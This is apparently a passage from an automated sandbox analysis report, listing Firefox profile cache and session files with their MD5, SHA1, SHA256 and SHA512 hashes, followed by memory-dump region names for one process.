C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | ef680d343ff5252988f773266a176f67 |
| SHA1 | fd3d7a60d06a31dd5f536624a9427abac1f2deb4 |
| SHA256 | 3a1535a9ecf04959af1a05ce8797628f879be947564ff9738bed1e2bd518d5e6 |
| SHA512 | 0f23b958f473ca1044dd4110d5e0318337fa6b99ad62b0488cb08d9a44d52ae5e3dbebb43a5978002e44d750ca6e3c407fee16a99f9714205899d30830c7e126 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\20506
| MD5 | 89be9219021a8e65d7f202eece918dcb |
| SHA1 | 9babd7976d20b4f38369fde1adf667fe4004df00 |
| SHA256 | 0974174b8f072c2c405d0103fd9deb91f4fc63e70be2e121a02624bb2f3d58c1 |
| SHA512 | b5894ffde293c21c3a3c93db22fbce1dd361ca68c0ed25418afe03b92c12d70dff78f251107a4dd90d40d8a0db6f704b8fac728ebbedcdc33ccf402812f3753a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4026
| MD5 | 67a520eedaab2d42dcf01c75827f408e |
| SHA1 | c1328efe062bf82a2b040628eb1e95fa168d53ef |
| SHA256 | 10a50d592b405abc661e3fd684211f9aeb54ff2d505f1e5e41091845633c91b4 |
| SHA512 | 43d6289f02cf3308a901ed4a2037e87552633745e532c27aaebb86a72a2693b75c6881592d2e92385edf70cee14247e21589614c5ff663bffefca639257015be |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\27156
| MD5 | 50ee6c8d2530692949e48d9155de6577 |
| SHA1 | 4d07486c346242ee9af1e3fa8a7eb8be75f1684c |
| SHA256 | 4d29d9b0270b85bddb772bd110b840f7ae5e3b981f8fd84babf4d6a7538ac1c1 |
| SHA512 | 992656f601c31c399a2921c1bde4e222a6d04014ba9b36724a8d80b3bc233045fb1ff2c2692b1702bd982fe61d8e23c555c25af8698780b8f52e1fc59f31d19a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\9\{b4909cd2-7ec4-4b3a-a4ad-7b154a85a209}.final
| MD5 | 292a587101f8f12d5a31a4afdd1ace9c |
| SHA1 | f8a7d0b03416f43a1ace59b1dc77b4acc7123389 |
| SHA256 | 8a02dcfad0519edb3da976edbd23a4fd2fd49ab87321011651287e35b6036563 |
| SHA512 | 6ae668092d673ae90a03fac533cc92c0fd7c0b54f6aee267f2ae99842e554e2660b10599d30bfc5cbaf6902873f5a23e6dddc393d81b5a2ddd0b514371b93e9f |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\2876
| MD5 | e652f940d0aa29aeb1e3f005c219caa5 |
| SHA1 | ff0d2916279d5110aedd983263971397e6eacb59 |
| SHA256 | efda3db576be1a63155cbf87d6ece6b1923a53ae1c2b9f677d4658d2bf4ab463 |
| SHA512 | f2a7ebed61e3a699dc04c0d775a01170f6c8606b1b9ff016e5d2b4c0a7a8c378c6e8854ec7f5f838ace62feee7997af48c6ed455b6940d9449c8afc00337d01d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a441ad907a3fe989221c43a7519a9039 |
| SHA1 | f42ddcc55a59019bab05abda27880274b9bb3fb5 |
| SHA256 | 5644b7d2f9dbc6c25be2ed4b290ff44f9e22ca98dbc6a7b785fe31b0bcb03140 |
| SHA512 | ff2bb74778d1dc85459e3df83d81e5f1f22aa2533b45dfd366ddb3c99cb388937e1043264e4712a94bf9eeeaa4a728b37a826e79da74b7f8a7eb3ddce3d4fa48 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\6516
| MD5 | 4d713ce24637240ab400445043f13fbd |
| SHA1 | ce6ef653f268e34091e4f6bc51413779cfa4ef17 |
| SHA256 | 078d5819c5497e7948c4c8b41acfb6568d9a8c252234443697ed61c603468751 |
| SHA512 | 045b11b586d463782454417e0edebef87c32acb697effef20c9447241846c14ebc5872008b3f690efb6b1a65e6fefe5507110fa4572a27985e85d650671640b0 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\EDF4BF647A47A8CCC2D2ABF030AF096FE5297F89
| MD5 | 2454c6d66dd804c49fb36ca40051f6c3 |
| SHA1 | 3a263bd9cbd17e8ff03fa27ca566e20f39ca3d90 |
| SHA256 | 55a755a7b0d98856af8ef24e09d069dbbbd166f8049dde00d1780c410baffe3c |
| SHA512 | 207f613e894db86dbf56c853f58baa0ce0212faff8055b296cc8d8d281ec619273767503a1e082923e5e7b024b5c78bb35b87c436f67217c5a8869a69e6eb94a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\152\{e1232316-9b19-4f92-8f72-958817e81898}.final
| MD5 | 1e312b0c2cc8e578d800e240c808594d |
| SHA1 | d5cfaab1e3286e4465d5276292c8fdaf851bfa76 |
| SHA256 | e94dab06d9360836eb77c6f15bc9233c38ac505feeb6de2054c983e52fc292a1 |
| SHA512 | a38ca2c4211179431eabb9ac5fe5f00191901e1a7bc905b46203276cce5149be727b4cb7799169fcfd024b45821f2e77168239fad2f3a2fc2573241aaed388e8 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\23988
| MD5 | 32c5f85ce9bcb440b54010fe59f892b4 |
| SHA1 | b088969f4b8ad94056d3852968c5c18afb5739c3 |
| SHA256 | e7f004dbd137da5d6a7f3831da66d699a5b35cf861d68028626392a0f5a6c40f |
| SHA512 | 2378860239434ee2b0d5f892c0fc4d2cbb1119d4ef7e20533513ee0b58cac0981440d1b5fd992892fcf88bae21e841144adfd927e89b146c3e130c7535fd8fa9 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\14160
| MD5 | 6d6cf93a9fe5c69307078053c4dad92f |
| SHA1 | 35091a8566d9dcdfcab6ee39f8f19abc4df91209 |
| SHA256 | 163bdb7fc5e7b78ccb3a09fdd55396772d7f0a42eda9fc22c606c282d5b8847f |
| SHA512 | 5096ad7641e71278a3daa284c040f66051139db91c9d4d435d249f72437ccf2d11e8315260c67c603e22a54ecc33c82619c11fe2e3cc3b5a193adfb3675915dc |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15552
| MD5 | a54ffa0833b9cb58a00039b8ea1d5b22 |
| SHA1 | 55618017622b1f740870eaecb7b51993e6ec5df3 |
| SHA256 | deee7c5e0c00b21f84ab0dc0733904c5b76da343248b255d14b0e85640b69337 |
| SHA512 | 7322cd9ff59fc977dbbbc6b7c22506dae81ae2c532b5d6d0bb5dc0ca6a5989187bca285c671af257278278759b23250ad88d476e4493dde73dddcbb4a5773e74 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | f01839c17bd852e051fd1db81669e299 |
| SHA1 | 569aac369b43fb28f5aa756a67358bd91470bcbc |
| SHA256 | 99f146da5ee11cb5c83ba6ad7bb561c31c506668f1503ffc834151bb556d800f |
| SHA512 | e35e6353f54902c5b1ac4d6547c552256faff753aabe8c0142177287b94571476b0358a59d1b7ded87c995300c6ec949068c3c5e4629b8c1f57af00455072ba9 |
memory/3864-1985-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp
memory/3864-1987-0x00007FFC91070000-0x00007FFC91265000-memory.dmp
memory/3864-1989-0x00007FFC91070000-0x00007FFC91265000-memory.dmp
memory/3864-1988-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp
memory/3864-1991-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp
memory/3864-1993-0x00007FFC91070000-0x00007FFC91265000-memory.dmp